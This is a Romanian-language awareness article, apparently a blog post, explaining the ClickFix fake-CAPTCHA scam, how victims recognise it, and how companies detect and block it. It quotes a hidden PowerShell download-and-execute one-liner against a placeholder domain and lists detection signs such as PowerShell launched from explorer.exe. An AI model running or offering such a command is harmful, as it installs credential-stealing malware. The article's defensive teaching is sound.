De dimineata, un coleg de la contabilitate a dat sa descarce un model de factura de pe un site care parea in regula. A aparut o caseta cunoscuta: "Verifica daca esti om". A bifat-o, ca de o mie de ori inainte. Apoi pagina i-a cerut sa apese Win+R, sa lipeasca un text si sa dea Enter, ca sa termine verificarea.
Daca ar fi facut-o, in zece secunde ii zburau din calculator parolele salvate in browser, cookie-urile de sesiune si datele de card. Fara niciun fisier descarcat. Fara ca antivirusul sa scoata un sunet.
Asta e ClickFix. Sau, pe romaneste, scamul cu captcha fals. Si nu e o pacaleala de amatori - este o tehnica prin care atacatorii patrund in calculatoare chiar acum, in 2026.
Cum arata scam-ul, pas cu pas
Totul incepe banal. Ajungi pe o pagina printr-o reclama otravita, printr-un rezultat de cautare manipulat, printr-un mail de phishing sau pentru ca site-ul legitim pe care-l vizitai a fost spart. WordPress-urile cu Elementor sau WooCommerce sunt vanate in masa exact pentru asta. Uneori e o falsa intalnire video care iti cere sa "verifici microfonul". Alteori, un installer de program "gratuit".
Pagina iti pune in fata o caseta de verificare care imita perfect Cloudflare sau Google reCAPTCHA. Cand bifezi casuta, in fundal un script iti copiaza pe ascuns o comanda in clipboard. Tu nu vezi nimic. Apoi vin instructiunile: apasa Win+R, lipeste cu Ctrl+V, da Enter. Pe Mac, deschide Terminal. Suna a pas tehnic plictisitor, exact genul pe care il faci pe pilot automat.
In clipboard te asteapta ceva de genul:
# Asa arata comanda ascunsa care ti se lipeste in clipboard:
powershell -w hidden -nop -c "iex (irm https://[domeniu-fals]/a)"Textul vizibil pare scurt si inofensiv. Adevaratul "cod de verificare" e un sir de sute de caractere, payload-ul obfuscat. Comanda descarca si ruleaza un infostealer. Cel mai des e Lumma Stealer, pe care Microsoft il numeste cea mai folosita incarcatura din ClickFix, dar lista e lunga: NetSupport RAT, DarkGate, AsyncRAT, iar pe Mac Atomic Stealer.
Exemple
ClickFix nu sta doar in spatele unei casute de captcha. Cercetatorii au gasit o pagina falsa de "Windows 12 Beta" care iti cere sa deschizi Run si sa lipesti o comanda ca sa instalezi sistemul. Au aparut false intalniri video care, inainte sa intri, iti cer sa verifici microfonul printr-un script. Si o varianta care nu mai vrea sa-ti puna malware deloc - te pune sa trimiti un SMS ca sa demonstrezi ca esti om, iar SMS-ul pleaca spre numere internationale scumpe si iti umfla factura cu vreo 30 de dolari, din care o felie ajunge la atacator.
Multe dintre paginile astea nici nu te lasa sa pleci usor. Cand dai back, un script rescrie istoricul browserului si te arunca inapoi pe pagina de scam. De-aia reflexul corect nu e sa te lupti cu pagina, ci sa inchizi tab-ul direct.
Cum ajungi pe ele? Cel mai des prin reclame otravite si prin cautari manipulate - cineva plateste sa apara sus in Google pe un cuvant cautat des. Apoi prin site-uri legitime sparte si prin mailuri de phishing. Una peste alta, pagina falsa te poate astepta oriunde, nu doar pe un site dubios.
De ce nu te salveaza antivirusul
Comanda o rulezi tu, cu mainile tale. Nu se descarca niciun executabil pe care un gateway de mail sau un antivirus sa-l prinda. Pentru calculator, e doar un utilizator care a deschis Run si a tastat ceva. Activitate normala, in aparenta.
Microsoft documenteaza mii de calculatoare compromise lunar in felul asta - inclusiv masini care aveau EDR instalat. Patch-urile la zi nu ajuta, fiindca atacul nu exploateaza nicio vulnerabilitate de software. Exploateaza obisnuinta ta de a da click pe casute de verificare fara sa te gandesti.
Si aici e partea care ma enerveaza la subiectul asta. Jumatate din industrie vinde "antivirus next-gen cu AI" ca pe leacul universal, cand veriga slaba e un om obosit care bifeaza o casuta cunoscuta la final de zi. Niciun program nu repara reflexul ala. Pe bune, kit-urile de ClickFix se vand cu abonament lunar, 200 pana la 1500 de dolari - e un business, nu o joaca.
Cum recunosti scamul intr-o secunda
Exista o singura regula care prinde aproape toate variantele: un captcha adevarat ramane in browser. Bifezi o casuta, alegi imagini cu semafoare, rotesti o piesa. Atat.
In momentul in care o "verificare" iti cere sa iesi din browser, sa deschizi o fereastra de sistem sau sa lipesti ceva, te-ai lovit de fals. Mai sunt cateva semne care te ajuta: un cod de verificare lung de sute de caractere (ala e payload-ul, nu un token), o verificare pe tot ecranul aparuta brusc pe un site pe care-l folosesti de mult si care n-a cerut asa ceva niciodata, sau un mesaj de tip "apasa Allow / copiaza comanda ca sa continui". Unele pagini merg pe panica - imita un ecran albastru de eroare Windows ca sa te grabeasca. Variantele cu panica au, conform cercetatorilor, o rata de reusita cu 15% mai mare. Frica te face sa nu mai verifici sursa.
Ce faci daca ai apucat sa dai Enter
Daca ai rulat comanda, presupune ca esti deja compromis si misca-te repede.
Deconecteaza calculatorul de la internet pe loc - scoate Wi-Fi-ul sau cablul. De pe alt dispozitiv curat, schimba parolele la conturile importante, incepand cu mailul si bankingul. Scaneaza masina infectata cu un antivirus de incredere, offline. Urmareste extrasele de cont si cardurile in zilele urmatoare.
Intr-o companie, lucrurile nu se opresc la un calculator. Pleci de la ideea ca s-au furat credentiale si le rotesti. Cauti in logurile de SIEM si EDR procese suspecte. Verifici persistenta - scurtaturi LNK in folderul Startup si task-uri programate sunt locurile clasice unde se aseaza malware-ul ca sa porneasca odata cu sistemul.
Cum isi acopera o companie spatele
Aici e diferenta intre o companie care doarme linistita si una care suna panicata la 7 dimineata.
Training-ul generic de phishing nu te ajuta aproape deloc. Oamenii care au facut cursuri despre "nu da click pe linkuri suspecte" tot cad in ClickFix, fiindca aici nu e niciun link suspect - e o casuta familiara. Antreneaza-i pe tiparul asta concret: arata-le capturi reale de captcha fals Cloudflare si Google care cer Win+R. Cand au vazut imaginea o data, o recunosc.
Tehnic, restrangi suprafata. Limitezi PowerShell-ul si scripting-ul pentru utilizatorii fara drepturi de admin, prin AppLocker, WDAC sau constrained language mode. Acolo unde se poate, blochezi dialogul Run prin GPO. Si pui monitorizare care sa prinda exact comportamentul: powershell.exe sau mshta.exe pornite din explorer.exe (semnatura clasica a unei comenzi date din Run), intrari noi in RunMRU, trafic DNS catre rezolvere din afara companiei. Varianta noua de ClickFix isi pune servere DNS hardcodate ca sa ocoleasca filtrarea ta de DNS - daca nu te uiti la asta, treci pe langa ea.
Un SIEM configurat sa alerteze pe tiparele astea prinde atacul si atunci cand antivirusul tace. Asta e toata ideea: nu astepti fisierul rau, astepti comportamentul rau.
Pana citesti randul asta, undeva un alt om obosit bifeaza caseta si apasa Win+R fara sa stea pe ganduri. Casuta falsa arata exact ca aia adevarata - asta e tot secretul. Singura aparare care tine pasul nu e un program. E secunda in care te opresti inainte sa dai Enter.
